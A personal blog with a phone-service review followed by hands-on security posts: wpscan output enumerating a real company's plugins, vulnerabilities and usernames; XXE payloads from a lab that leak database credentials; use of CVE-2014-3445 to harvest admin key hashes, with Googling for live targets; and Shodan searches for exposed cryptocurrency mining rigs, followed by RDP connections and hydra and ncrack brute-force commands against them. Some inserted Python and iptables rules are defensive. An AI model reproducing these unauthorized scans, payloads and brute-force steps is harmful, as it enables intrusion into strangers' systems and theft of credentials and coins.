aD

Jul 23, 2014

First month with Republic Wireless

So to start off, I have been following RW since the beginning and was accepted into all the beta rollouts, but I never had the money to purchase the phones. First I was on Cricket, then I moved to GoSmart Wireless, always with a crappy out-of-date phone, and for a techy like me it was a nightmare: I would try to do stuff with my phone only to have it lock up for a minute. I struggled to receive and send calls, and my service was spotty at best. My college requires me to have a weekly phone call with a student-mentor, and having the calls drop on my old service was a constant pain in the butt. I was also in a constant state of worry while waiting to hear back from jobs I had applied for, because I was afraid I had missed the call, which happened frequently. About a month ago, my wife had some major medical stuff going on, and she was texting me and calling me, but I didn't get them because my service and phone were terrible. When she finally got hold of me (after I walked into the ER), she glared at me and said "Get your new phone". I plan on breaking this review into two parts, the phone and the service/company. So here goes:

Republic Wireless:
Like I said, I have been wanting to join since the beginning but never could afford it. When I heard that RW was picking up the Moto G for $150 I was excited and couldn't wait till I could afford it. After I placed my order, it was sent out the next day and arrived quite some time later (I hate shipping companies); I was excited to start up my phone and see if things would be different. I was extremely pleased. Activating my account was a snap. Transferring my phone number was a snap. Making and receiving phone calls was finally happening! My office is out in the garage, so I was worried about my connection to WiFi/Cell, but service was great and the handovers were smooth if I decided to take a walk while making my phone calls. I would hear a click, half a second of silence, and then the call would pick right up. I was told sometimes my voice drops, but that isn't the fault of RW but rather my 9mb/1mbps connection. I want to upgrade my DSL but that will have to wait till after I get a good job. I've been extremely pleased with my service and connection.

Moto G: I bought the 8GB version because that was all I could afford at the time. I was thinking I wouldn't use all of the 8GB, as I never did on my old phones; boy, was I wrong. I knew the phone didn't have an SD card slot and thought I wouldn't miss it; again, I was wrong. I constantly take pictures and videos of my kids, and that burns through the 8GB rather quickly. I did get the free 50GB of space from Google, and while I like having all my videos/pictures on hand, I got used to browsing them from the internet (again, thank you RW for good service): after taking them and auto-backing them up, I would delete them off my phone and just browse them on my G-Drive. However, I was still running out of space because I am now playing a lot more 3D games, because this phone has the power to play them, unlike my old phone(s). Man, this phone is a power-house! My only complaint is that I cannot root/modify it, because I don't want to screw with the RW app that manages the connection. That was a big disappointment, as I am a huge mod nuthead. I have designed 3 ROMs for an Android tablet where there were only two developers, me and my friend who taught me how to create ROMs. So not being able to modify the phone was a bit disappointing, BUT I really didn't need to modify the phone, as it performs amazingly. There is an occasional glitch where, after opening the app menu, I don't see anything, but it happens only occasionally.

I have been extremely pleased and happy with what I paid for.

Jun 24, 2014

Always good to have a positive response

I was curious about a certain company's website, so I did a scan of it and was able to enumerate not only all their WordPress plugins (and vulnerabilities and exploits) but also user IDs and usernames.


[+] URL: http://xxxxxxxx/
[+] Started: Wed Jun 11 21:29:40 2014

[+] robots.txt available under: 'http://xxxxxxxx/robots.txt'
[!] The WordPress 'http://xxxxxxxx/readme.html' file exists
[+] Interesting header: CF-RAY: 1390e7f7776d02da-AMS
[+] Interesting header: SERVER: cloudflare-nginx
[+] XML-RPC Interface available under: http://xxxxxxxx/xmlrpc.php

[+] WordPress version 3.8.3 identified from meta generator

[+] Name: akismet - v2.5.9
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/akismet/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/akismet/readme.txt

[+] Name: backwpup - v3.1.2
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/backwpup/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/backwpup/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/backwpup/

[!] Title: BackWPUp 2.1.4 - Code Execution
   Reference: http://www.exploit-db.com/exploits/17987/

[!] Title: plugin BackWPup 1.5.2, 1.6.1, 1.7.1 - Remote and Local Code Execution Vulnerability
   Reference: http://osvdb.org/71481

[+] Name: better-wp-security - v3.6.5
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/better-wp-security/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/better-wp-security/readme.txt

[!] Title: Better WP Security 3.6.3 - Online Backup Storage current_time Function Brute Force Disclosure
   Reference: http://packetstormsecurity.com/files/125219/
   Reference: http://osvdb.org/103358

[!] Title: Better WP Security 3.6.3 - /zzzzzzz/admin-ajax.php license Parameter Stored XSS Weakness
   Reference: http://packetstormsecurity.com/files/125219/
   Reference: http://osvdb.org/103357

[+] Name: calculated-fields-form - v1.0.1
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/calculated-fields-form/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/calculated-fields-form/README.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/calculated-fields-form/

[+] Name: contact-form-7 - v3.7.2
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/contact-form-7/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/contact-form-7/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/contact-form-7/
[!] An error_log file has been found: http://xxxxxxxx/xxxxxxxx/plugins/contact-form-7/error_log

[!] Title: Contact Form 7 & Old WP Versions - Crafted File Extension Upload Remote Code Execution
   Reference: http://packetstormsecurity.com/files/125018/
   Reference: http://seclists.org/fulldisclosure/2014/Feb/0
   Reference: http://osvdb.org/102776

[+] Name: dw-question-answer - v1.2.8
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/dw-question-answer/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/dw-question-answer/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/dw-question-answer/

[+] Name: google-analytics-dashboard-for-wp - v4.2.18
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/google-analytics-dashboard-for-wp/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/google-analytics-dashboard-for-wp/readme.txt

[+] Name: google-analytics-for-wordpress - v4.3.5
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/google-analytics-for-wordpress/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/google-analytics-for-wordpress/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/google-analytics-for-wordpress/

[+] Name: jetpack - v2.7.2
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/jetpack/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/jetpack/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/jetpack/

[!] Title: Jetpack <= 2.9.2 - class.jetpack.php XML-RPC Access Control Bypass
   Reference: http://jetpack.me/2014/04/10/jetpack-security-update/
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0173
   Reference: http://secunia.com/advisories/57729
   Reference: http://osvdb.org/105714
[i] Fixed in: 2.9.3

[+] Name: link-manager
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/link-manager/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/link-manager/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/link-manager/

[+] Name: mailchimp - v1.4.1
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/mailchimp/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/mailchimp/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/mailchimp/

[+] Name: members - v0.2.4
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/members/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/members/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/members/

[+] Name: pdfjs-viewer-shortcode - v1.2
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/pdfjs-viewer-shortcode/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/pdfjs-viewer-shortcode/readme.txt

[+] Name: really-simple-captcha - v1.7
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/really-simple-captcha/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/really-simple-captcha/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/really-simple-captcha/

[+] Name: smart-manager-for-wp-e-commerce - v3.6
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/smart-manager-for-wp-e-commerce/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/smart-manager-for-wp-e-commerce/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/smart-manager-for-wp-e-commerce/

[+] Name: woocommerce - v2.1.2
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce/

[+] Name: woocommerce-bulk-discount - v2.2
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-bulk-discount/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-bulk-discount/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-bulk-discount/

[+] Name: woocommerce-delivery-notes
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-delivery-notes/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-delivery-notes/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-delivery-notes/

[+] Name: woocommerce-product-archive-customiser - v0.3.0
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-product-archive-customiser/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-product-archive-customiser/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-product-archive-customiser/

[+] Name: woocommerce-sequential-order-numbers - v1.3.1
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-sequential-order-numbers/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-sequential-order-numbers/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-sequential-order-numbers/

[+] Name: wordpress-importer - v0.6.1
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-importer/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-importer/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-importer/

[+] Name: wordpress-popup - v4.4.5.4
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-popup/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-popup/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-popup/

[+] Name: wordpress-seo - v1.4.25
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-seo/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-seo/readme.txt
|  Changelog: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-seo/changelog.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-seo/

[!] Title: WordPress SEO 1.14.15 - index.php s Parameter Reflected XSS
   Reference: http://packetstormsecurity.com/files/123028/
   Reference: http://osvdb.org/97885

[!] Title: WordPress SEO 1.4.6 - Reset Settings Feature Access Restriction Bypass
   Reference: http://secunia.com/advisories/52949
   Reference: http://osvdb.org/92147

[+] Name: wp-advanced-importer
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-advanced-importer/
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wp-advanced-importer/

[+] Name: wp-countdown-timer - v1.0.0
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-countdown-timer/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/wp-countdown-timer/README.txt

[+] Name: wp-fastest-cache - v4.3
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-fastest-cache/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/wp-fastest-cache/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wp-fastest-cache/

[+] Name: wp-mail-smtp - v0.9.4
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-mail-smtp/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/wp-mail-smtp/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wp-mail-smtp/

[+] Name: wp-memory-usage
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-memory-usage/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/wp-memory-usage/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wp-memory-usage/

[+] Name: wp-super-cache - v1.4
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-super-cache/
|  Readme: http://xxxxxxxx/xxxxxxxx/plugins/wp-super-cache/readme.txt


[+] Enumerating usernames ...
[+] Identified the following 8 user/s:
   +----+--------------+--------------+
   | Id | Login        | Name         |
   +----+--------------+--------------+
   | x  | xxxx         | xxxx         |
   | x  | xxxxxxxx     | xxxxxxxx     |
   | x  | xxxxxx       | xxxxxx       |
   | x  | xxxxxxxxxx   | xxxx         |
   | x  | xxxxxxxxxxxx | xxxxx        |
   | x  | xxxxxxxx     | xxxxxxxx     |
   | x  | xxxxxxxxxxxx | xxxxxxxxxxxx |
   | xx | xxxxxx       | xxxxx        |
   +----+--------------+--------------+
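As an added example (not from the post, and not wpscan's own code), a small triage script that parses output in the layout above into a remediation list the site owner could act on; its input is a constructed excerpt of a few entries from the scan above.

```python
import re

# Constructed excerpt in the same layout as the wpscan output above; plugin
# names and versions are copied from the post, the host is the post's placeholder.
SCAN_OUTPUT = """\
[+] WordPress version 3.8.3 identified from meta generator

[+] Name: akismet - v2.5.9
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/akismet/

[+] Name: backwpup - v3.1.2
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/backwpup/
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/backwpup/

[!] Title: BackWPUp 2.1.4 - Code Execution
   Reference: http://www.exploit-db.com/exploits/17987/

[+] Name: jetpack - v2.7.2
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/jetpack/
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/jetpack/

[!] Title: Jetpack <= 2.9.2 - class.jetpack.php XML-RPC Access Control Bypass
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0173
[i] Fixed in: 2.9.3

[+] Name: link-manager
|  Location: http://xxxxxxxx/xxxxxxxx/plugins/link-manager/
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/link-manager/
"""

VERSION_RE = re.compile(r"^\[\+\] WordPress version (\S+)")
PLUGIN_RE = re.compile(r"^\[\+\] Name: (\S+)(?: - v(\S+))?")
DIRLIST_RE = re.compile(r"^\[!\] Directory listing is enabled:")
TITLE_RE = re.compile(r"^\[!\] Title: (.+)$")
FIXED_RE = re.compile(r"^\[i\] Fixed in: (\S+)")


def version_tuple(v):
    """'2.9.3' -> (2, 9, 3); non-numeric parts are dropped so comparison works."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def parse_wpscan(text):
    """Parse the scanner's text layout. Returns (wp_version, plugins) where
    plugins maps name -> {"version", "dir_listing", "findings"}.
    wpscan prints a plugin's findings under that plugin's entry, so each
    [!] Title / [i] Fixed in line is attached to the most recent [+] Name."""
    wp_version, plugins, current = None, {}, None
    for line in text.splitlines():
        m = VERSION_RE.match(line)
        if m:
            wp_version = m.group(1)
            continue
        m = PLUGIN_RE.match(line)
        if m:
            current = m.group(1)
            plugins[current] = {"version": m.group(2), "dir_listing": False, "findings": []}
            continue
        if current is None:
            continue
        entry = plugins[current]
        if DIRLIST_RE.match(line):
            entry["dir_listing"] = True
        elif (m := TITLE_RE.match(line)):
            entry["findings"].append({"title": m.group(1), "fixed_in": None})
        elif (m := FIXED_RE.match(line)) and entry["findings"]:
            entry["findings"][-1]["fixed_in"] = m.group(1)
    return wp_version, plugins


def remediation_list(plugins):
    """One action item per issue. A finding is marked CONFIRMED only when the
    installed version is known and below the scanner's 'Fixed in' version;
    wpscan lists historical advisories for a plugin regardless of the version
    it found, so the rest need a manual check against the advisory."""
    items = []
    for name, info in plugins.items():
        installed = info["version"]
        for f in info["findings"]:
            if installed and f["fixed_in"] and version_tuple(installed) < version_tuple(f["fixed_in"]):
                status = f"CONFIRMED (installed {installed} < fixed {f['fixed_in']}): update"
            else:
                status = "CHECK advisory against installed version"
            items.append(f"{name}: {f['title']} -> {status}")
        if info["dir_listing"]:
            items.append(f"{name}: directory listing enabled -> disable indexes on the web server")
    return items
```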

I was surprised at my results and decided to write a quick email to the owner of the company with my information. I got a nice thank you letter back.

A couple weeks later, on a public forum, he thanked me again, said it was all taken care of now, and asked me to send my contact info. I did, and never heard anything back.

This arrived in the mail yesterday.




May 30, 2014

Practicing XXE


***DISCLAIMER ALL MY WORK HERE IS DONE AT WWW.HACKING-LAB.COM*****




XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage. External entities can reference files on the parser's filesystem; exploiting this feature may allow retrieval of arbitrary files, or denial of service by causing the server to read from a file such as /dev/random.

They can also reference URLs; exploiting this feature may allow port scanning from the XML parser's host, or the retrieval of sensitive web content which is otherwise inaccessible due to network topology and defenses.

I performed this attack by first working out how the search form builds its XML request, monitoring the connection with ZAP. After submitting a test search, I looked at how the request appeared in ZAP, then resent the packet with modified parameters.

The first injection I used to see if it was possible was the following:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
    <!ENTITY foo SYSTEM "file:///etc/passwd">
    ]>
    <query>
            <result-limit>1&foo;</result-limit>
            <bell-name></bell-name>
            <bell-description></bell-description>
    </query>
   
After confirming that the application was vulnerable to this type of attack, I began trying other file locations, looking for configuration files for the MySQL database. I started in the usual places, /etc/my.cnf, root/.mycnf and so forth, until I came across the properties file for the web application itself.

I then modified my injection parameters to this:
   
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
    <!ENTITY foo SYSTEM "file:///opt/applic/tomcat/webapps.properties/mysql.properties">
    ]>
    <query>
            <result-limit>1&foo;</result-limit>
            <bell-name></bell-name>
            <bell-description></bell-description>
    </query>
   
I inserted it back into ZAP, resent the packet, and got back the following:

# MYSQL PROPERTIES - TIME IN SECONDS
################################################################
mysql.driver = org.gjt.mm.mysql.Driver

mysql.username = glockenemil
mysql.password = Nt88,.po

mysql.bells.url = jdbc:mysql://127.0.0.1:5506/glocken_emil?autoDeserialize=true
mysql.login.url = jdbc:mysql://127.0.0.1:5506/login
mysql.session.url = jdbc:mysql://127.0.0.1:5506/sessionservice

mysql.session.testquery =
mysql.login.testquery =
mysql.bells.testquery =

mysql.connections.max               = 100
mysql.connections.min               = 10
mysql.connections.increaserate      = 2
mysql.connections.timeout           = 120
mysql.connections.maxage            = 900

# LOGIN TABLE DEFS
#################################################################
mysql.tblLogin = users

mysql.fldAdditionalTime = additionaltime
mysql.fldReleaseTime = releasetime
mysql.fldUsername = username
mysql.fldTries = tries
contactForm = no
   
   
XML external entity injection makes use of the DOCTYPE tag to define the injected entity. XML parsers can usually be configured to disable support for this tag; consult the documentation for your XML parsing library to find out how to disable this feature. It may also be possible to use input validation to block input containing a DOCTYPE tag.
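As an added example (not part of the original post or of the lab application; it uses Python's stdlib SAX parser rather than the Java stack the lab runs), a parser for the <query> request format above that applies both mitigations: it refuses any DOCTYPE up front, and it disables external entity resolution in the parser itself so a SYSTEM entity is never fetched even if the first check is bypassed. The benign query is constructed; the payload is the one from the post.

```python
import re
import xml.sax
from xml.sax import handler
from xml.sax.handler import ContentHandler

# Constructed samples: a benign search request in the <query> shape the post
# shows, and the DOCTYPE-bearing payload from the post.
BENIGN_QUERY = """<?xml version="1.0" encoding="UTF-8"?>
<query>
    <result-limit>1</result-limit>
    <bell-name>big ben</bell-name>
    <bell-description></bell-description>
</query>"""

XXE_QUERY = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY foo SYSTEM "file:///etc/passwd">
]>
<query>
    <result-limit>1&foo;</result-limit>
    <bell-name></bell-name>
    <bell-description></bell-description>
</query>"""

# Input-validation layer: a search request never needs a DTD, so any
# DOCTYPE declaration is refused outright.
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


class QueryHandler(ContentHandler):
    """Collects the text content of each child element of <query>."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name != "query":
            self._current = name
            self.fields.setdefault(name, "")

    def characters(self, content):
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def parse_query(xml_text, reject_doctype=True):
    """Parse a <query> request with two independent defences:
    1. refuse documents containing a DOCTYPE (the validation the post suggests);
    2. tell the parser not to resolve external general entities, so a SYSTEM
       entity like the one in the payload is skipped instead of being read.
    Returns (fields, error); error is None on success."""
    if reject_doctype and DOCTYPE_RE.search(xml_text):
        return None, "rejected: DOCTYPE declarations are not accepted"
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)
    collector = QueryHandler()
    parser.setContentHandler(collector)
    try:
        parser.feed(xml_text)
        parser.close()
    except xml.sax.SAXException as exc:
        return None, f"rejected: {exc}"
    return collector.fields, None
```

With `reject_doctype=False` the second layer alone is exercised: the payload either fails to parse or yields a bare "1" for result-limit, never the file contents.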

May 28, 2014

Application of CVE-2014-3445

Unauthenticated key return

This morning I happened to notice on Twitter a recently released CVE that provides a surprisingly easy attack vector to recover a website's administrator password, as long as it is running the affected software.

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3445/

“Vulnerability title: Unathenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages"


“The default setup allows an unauthenticated user to access administrative functions such as backing up of key files within the CMS. This is done by appending the following to a domain using the software affected:

/backup.php?a=2&k=6f15afa1ac4edea0g145e884116334b7

Where “a” is the file number to back up and “k” is the MD5key used to authenticate the administrator, however if “k” does not match the correct key rather than disallowing the unauthenticated user to back up the file the service will provide the user with the correct key. 

For example:
Failure, wrong key. The right key is 5f17aca1ae2edea0f145e884116371a5

Using this new key in the url such as below:
/backup.php?a=2&k=5f17aca1ae2edea0f145e884116371a5 will allow the user to perform the backup of files.

In addition to this the key is generated by the code:
$backupkey=MD5

Making it trivial to decrypt the key provided above to gain the administrators password and gain further control over the site.”

This is surprisingly easy to accomplish.
Doing a quick search on Google provides plenty of targets


Here is a practice target:



I now have a target, and its page ID number
Simply modifying the provided CVE looks like this

WWW.TARGET_PRACTICE_WEBSITE.com/backup.php?9=2&k=6f15afa1ac4edea0g145e884116334b7

Returns this



As it returns an MD5 hash, it's simply a matter of time to reverse the hash and recover the password.
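As an added illustration (a constructed toy, not the product's code; the admin password is a sample value), the access check with the failure mode the advisory describes, beside a hardened version that requires an authenticated session, uses a token unrelated to the password, compares in constant time, and never echoes the expected key.

```python
import hashlib
import hmac
import secrets


class BackupEndpoint:
    """Toy model of a CMS backup endpoint taking ?a=<file>&k=<key> (constructed)."""

    def __init__(self, admin_password):
        # Scheme the advisory describes: key = MD5(admin password), so leaking
        # the key hands out an unsalted hash of the administrator's password.
        self.md5_key = hashlib.md5(admin_password.encode()).hexdigest()
        # Hardened scheme: a random per-install token with no relation to the
        # password; even if it leaked, there is nothing to "reverse".
        self.token = secrets.token_hex(16)

    def vulnerable(self, a, k):
        """Reproduces the behaviour quoted above: a wrong key is answered
        with the right one."""
        if k != self.md5_key:
            return f"Failure, wrong key. The right key is {self.md5_key}"
        return f"backup of file {a} performed"

    def hardened(self, a, k, session_is_admin):
        """Requires an authenticated admin session, compares the token in
        constant time (no timing side channel), and never echoes the
        expected value in the failure message."""
        if not session_is_admin:
            return "Failure, authentication required."
        if not hmac.compare_digest(k, self.token):
            return "Failure, wrong key."
        return f"backup of file {a} performed"
```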

Mar 28, 2014

BAMT Possibilities

Yet another dig into the security of BAMT mining client, an awesome project in itself!
As always, I started my search with Shodan for ‘bamt-miner’ to get a good idea of a test target to run an nmap on.



Here is a typical ‘bamt-miner’ port list.

Discovered open port 22/tcp on IP_ADDRESS
Discovered open port 3389/tcp on IP_ADDRESS
Discovered open port 5910/tcp on IP_ADDRESS
Discovered open port 5666/tcp on IP_ADDRESS
Port 22: SSH
Port 3389: RDP
Port 5910: modified VNC listening port
Port 5666: Munin process monitor

A more detailed look:

22/tcp   open     ssh           OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)
| ssh-hostkey: 1024 7f:86:d4:d4:cf:8d:87:9d:53:51:07:2b:12:9a:ca:7e (DSA)
|_2048 c6:ba:95:4e:e2:fe:47:e9:de:dc:4e:41:08:83:56:d2 (RSA)
25/tcp   filtered smtp
3389/tcp open     ms-wbt-server xrdp
5666/tcp open     tcpwrapped
5910/tcp open     vnc           VNC (protocol 3.8)
| vnc-info:
|   Protocol version: 3.8
|   Security types:
|     VNC Authentication
|_    Tight

Plugging in the IP address and the port, I was able to make a VNC connection but did not attempt a password entry. VNC does have the nice feature of timing out after every bad password attempt, which is great except for one weakness for the legitimate owner: someone brute forcing could cause a near-indefinite lockout, as VNC increases the timeout with every bad attempt. Just a quick note here: not everyone had VNC installed/running.





Now, the thing I was most interested in was port 5666, as I had never heard of it. It turns out to be a Munin graph monitor, something that BAMT makes heavy use of to monitor the system.

Doing my research, I came across one proof-of-concept exploit:
printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80

Also another possibility
Munin before 2.0.6 stores plugin state files that run as root in the same group-writable directory as non-root plugins, which allows local users to execute arbitrary code by replacing a state file, as demonstrated using the smart_ plugin.

munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.

Now typing in
I can see that it's running v1.4.5:
This page was generated by Munin version 1.4.5 at 2014-03-27 17:45:12+0000 (UTC)




Now I don’t really know if this version of Munin is vulnerable to these three possible exploits/vulnerabilities, as it’s a bit outside my skill level.

Another weakness is the open SSH on this host. This is my ncrack line
ncrack -f --user su,root,user -P top50000.pwd -d7 ssh://IP_ADDRESS,at=3




From reading on BAMT, these are the typical user accounts that exist on the system.

Here were my suggestions:
Update Munin version to 2.1.6 or whatever is newest

Add this to your iptables:
iptables -A INPUT -p tcp -i eth0 -m state --state NEW --dport 22 -m recent --update --seconds 15 -j DROP
iptables -A INPUT -p tcp -i eth0 -m state --state NEW --dport 22 -m recent --set -j ACCEPT


This will prevent brute-force attacks on SSH by slowing down connection attempts



***Update*****
So a little update: I talked to 'lodcrappo' on bitcointalk.

If someone is dumb enough to put a bamt machine directly on the net, they get what they deserve.  Write whatever you'd like, it won't help people that dumb anyway.
One other note.. Even if munin, ssh, and all the standard software was secured, a bamt rig is *not* safe and should never be unprotected on the net.  This is because the bamt tools themselves are fundamentally insecure.  This was a conscious design decision. Bamt nodes on a network communicate using completely unchecked and unfiltered protocols. There isn't even a semblance of authentication or security.  The bamt farm utilities like mgpumom will never be safe for internet use.
Please do not attempt to instruct anyone on how to secure a bamt node for internet connectivity, it cannot be done.  If you are writing an article it should focus on how to safely use bamt, and that means only behind nat / firewalls, period.

Mar 1, 2014

I want your coins!

"Cryptocurrency is a type of digital currency that is based on cryptography. Cryptocurrency uses cryptography for security, making it difficult to counterfeit. Public and private keys are often used to transfer the currency from one person to another."
http://www.techopedia.com/definition/27531/cryptocurrency

Why am I talking about this today? Well, because personally I use this. I have bitcoins, litecoins, and dogecoins. I personally run two XFX R9-270X and one XFX R9-270 on my Windows 7 machine, generating 1400KH/s a day. Typically I earn anywhere between $6-8 a day, which adds up to a nice amount of pocket change. However, I put some serious money into this computer, to the point where it takes me a month to pay off just one of those video cards. There are others out there like me, who are small-timers and do this as a hobby and for a bit of pocket change. However, there are those out there who do this for profit and invest incredible amounts of money.

Very few people think about the security of their mining machine, as the system is incredibly tough to beat. Bitcoin, however, recently showed that it is possible to beat the system. There is also a lot of malware out there designed to steal people's wallets. However, today I will be talking about an even less noticeable way to steal coins.

BAMT is an automated Linux distro designed to run off a flash drive, to ease the difficulty of managing and monitoring the process of mining scrypt-based coins. It's very nicely done and pretty easy to use. Most people use it successfully with no security risks, but there are those out there who don't realize it carries one risk. It applies to those who want to check on their machine from outside their home and do something terrible: they point their machine at a public-facing IP address!
Let's fire up Shodan, type in "bamt-miner" and see what results we get.



Wow, that is quite a few returns for a free user like me. As a free user, I am allowed access to 50 results, but if I were to pay just $5, I could have access to up to 10,000 results. That is a LOT of IP addresses.
So what if I have an IP address? What can I do with it? First, let's plug it into a web browser and see what we get.



We have confirmed that there is active mining going on.

Lets now also look at the guide for running bamt
https://litecointalk.org/index.php?topic=2924.0
blah blah blah blah blah blah blah......RDP?!?!??!?!?!?!?!?!?!?!??!??!

People are actually posting an RDP port, non-forwarded to the public. The question is, can I do it? Pull up Remote Desktop and let's punch in one of those IPs.



And I have successfully connected via RDP.



So the first thing I try is the default username and password listed in the guide:
user: user
pass: live

Doesn't work; good, as the guide recommends you change the user and the su password right away as one of the first steps. However, we STILL have a successful connection. Why is this important? Because BAMT does NOT include a timeout or bad-login-count system, which means I have all the time in the world to try various logins. Let's automate the process.

Now we know that there are two user accounts, "user" and "su"; typically 99% of people will not change the accounts, just the passwords, so I plug those into my user.txt and use one of my best password dictionaries, filled with typical passwords, and I select an American IP so that my American words will work.

"hydra -L users.txt -P the_best.txt -t 4 -W 3 IP.ADD.RESS.HERE rdp"
or
"hydra -P the_best.txt -t 4 -W 3 IP.ADD.RESS.HERE vnc"

